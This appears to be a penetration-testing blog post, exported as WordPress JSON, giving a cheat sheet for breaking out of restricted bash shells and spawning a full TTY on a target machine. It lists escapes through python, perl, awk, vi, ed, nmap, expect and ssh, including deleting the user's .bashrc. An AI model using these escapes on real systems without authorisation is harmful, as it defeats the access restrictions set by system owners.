{"id":134,"date":"2021-04-24T01:43:14","date_gmt":"2021-04-24T01:43:14","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=134"},"modified":"2021-10-06T00:13:30","modified_gmt":"2021-10-06T00:13:30","slug":"break-out-get-that-tty","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/break-out-get-that-tty\/","title":{"rendered":"Break Out. Get that tty."},"content":{"rendered":"\n<div class=\"wp-block-cover has-background-dim\"><img loading=\"lazy\" decoding=\"async\" width=\"3792\" height=\"5688\" class=\"wp-block-cover__image-background wp-image-96\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/04\/10.jpg\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p>Breaking out of a restricted shell.<\/p>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\">Spawn a valid tty.<br><br>::Teletype<\/p>\n<\/div><\/div>\n\n\n\n<p id=\"tty\"><br><strong>Out of the gate.<\/strong><\/p>\n\n\n<p><code><\/code><\/p>\n<p>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br \/>OR<br \/>python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br \/>export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmp<br \/>export TERM=xterm-256color<br \/><span class=\"s1\">alias ll='ls -lsaht --color=auto'<br \/><\/span><span class=\"s1\"><strong>Keyboard Shortcut:<\/strong> Ctrl + Z (Background Process.)<br \/>stty raw -echo ; fg ; reset<br \/>stty columns 200 rows 200<\/span><\/p>\n<p>\u00a0<\/p>\n<p>* Grab a valid tty.<br \/>* What OS are you on? Grab access to those binaries fast by exporting each environment variable. Debian\/CentOS\/FreeBSD<br \/>* Want a color terminal to easily tell apart file permissions? Directories? Files?<br \/>* Fastest way to list out the files in a directory, show size, show permissions, human readable.<br \/>* Make this shell stable.<\/p>\n<p><code><\/code><\/p>\n\n\n<p><br><br><strong>Is this rbash<\/strong> (<em>Restricted Bash<\/em>)<strong>?<\/strong> PT1<br>$ vi<br>:set shell=\/bin\/sh<br>:shell<br><br>$ vim<br>:set shell=\/bin\/sh<br>:shell<br><br><strong>Is this rbash<\/strong> (<em>Restricted Bash<\/em>)<strong>?<\/strong> PT2<br>(<em>This requires ssh user-level access<\/em>)<br>ssh user@127.0.0.1 \"\/bin\/sh\"<br>rm $HOME\/.bashrc<br>exit<br>ssh user@127.0.0.1<br>(<em>Bash Shell<\/em>) <\/p>\n\n\n\n<p><strong>Is python present on the target machine?<\/strong><br>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br>python -c 'import pty; pty.spawn(\"\/bin\/sh\")'<\/p>\n\n\n\n<p><strong>Is perl present on the target machine?<\/strong><br>perl -e 'exec \"\/bin\/bash\";'<br>perl -e 'exec \"\/bin\/sh\";'<\/p>\n\n\n\n<p><strong>Is AWK present on the target machine?<\/strong><br>awk 'BEGIN {system(\"\/bin\/bash -i\")}'<br>awk 'BEGIN {system(\"\/bin\/sh -i\")}'<\/p>\n\n\n\n<p><strong>Is ed present on the target machines?<\/strong><br>ed<br>!sh<\/p>\n\n\n\n<p><strong>IRB Present on the target machine?<\/strong><br>exec \"\/bin\/sh\"<\/p>\n\n\n\n<p><strong>Is Nmap present on the target machine?<\/strong><br>nmap --interactive<br>nmap&gt; !sh<\/p>\n\n\n\n<p><strong>Expect:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>expect -v\n  expect version 5.45.4\n  \n$ cat &gt; \/tmp\/shell.sh &lt;&lt;EOF\n#!\/usr\/bin\/expect\nspawn bash\ninteract\nEOF\n\n$ chmod u+x \/tmp\/shell.sh\n$ \/tmp\/shell.sh<\/code><\/pre>\n\n\n\n<p><br><br><br><br><br><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Out of the gate. python -c 'import pty; pty.spawn(\"\/bin\/bash\")'ORpython3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmpexport TERM=xterm-256coloralias ll='ls -lsaht --color=auto'Keyboard Shortcut: Ctrl + Z (Background Process.)stty raw -echo ; fg ; resetstty columns 200 rows 200 \u00a0 * Grab a valid tty.* What OS are you on? Grab access to those binaries fast by exporting each environment [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":96,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[14,13,12,10,4,11],"class_list":["post-134","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-breakout","tag-jailed-shell","tag-pentest","tag-restricted-shell","tag-s1ren","tag-tty"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=134"}],"version-history":[{"count":10,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134\/revisions"}],"predecessor-version":[{"id":477,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134\/revisions\/477"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/96"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}